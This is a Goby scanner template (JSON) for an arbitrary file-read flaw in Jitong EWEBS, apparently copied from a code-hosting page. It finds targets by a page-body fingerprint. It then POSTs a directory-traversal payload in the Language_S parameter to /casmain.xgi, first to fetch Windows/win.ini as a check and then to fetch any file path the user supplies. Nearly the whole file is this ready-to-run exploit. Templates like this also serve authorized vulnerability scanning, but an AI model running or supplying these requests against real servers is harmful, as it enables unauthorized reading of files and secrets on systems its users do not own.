Goby/json/Jitong_EWEBS_arbitrary_file...

84 lines
2.7 KiB
JSON

{
"Name": "极通EWEBS任意文件读取",
"Level": "3",
"Tags": [],
"GobyQuery": "body=\"极通软件\"",
"Description": "",
"Product": "",
"Homepage": "https://gobies.org/",
"Author": "gobysec@gmail.com",
"Impact": "",
"Recommandation": "",
"References": [
"https://gobies.org/"
],
"HasExp": true,
"ExpParams": [
{
"name": "file",
"type": "input",
"value": "../../../../../../../Windows/win.ini",
"show": ""
}
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/casmain.xgi",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "Language_S=../../../../../../../Windows/win.ini"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "MAPI=",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/casmain.xgi",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "Language_S={{{file}}}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "MAPI=",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-06-17 20:58:40",
"GobyVersion": "1.8.268"
}